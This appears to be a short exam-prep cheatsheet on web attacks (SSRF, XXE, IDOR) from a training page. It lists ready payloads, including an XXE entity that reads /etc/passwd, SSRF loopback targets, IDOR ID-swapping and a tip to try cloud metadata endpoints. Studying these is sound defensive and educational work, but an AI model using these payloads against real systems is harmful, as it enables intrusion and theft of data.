Web Attacks
Web
Overview
SSRF, XXE, IDOR and other web attacks.
1
Exercises
1
Flashcards
1
Mind Maps
Cheatsheet
SSRF
http://localhost:80 # Target local service http://127.0.0.1 # Target loopback IP http://0.0.0.0 # Target all interfaces
XXE
<!DOCTYPE foo [<!ENTITY xxe SYSTEM 'file:///etc/passwd'>]> <data>&xxe;</data> # Basic XXE payload to read /etc/passwd
IDOR
/api/user/1 β /api/user/2 # Change ID to access other user data /download?file=123 β 124 # Change file ID to download other files
Command Examples
Common Pitfalls
- Not checking internal ports
- XXE parser not vulnerable
Exam Survival Tips
- Try cloud metadata endpoints
- Check all ID parameters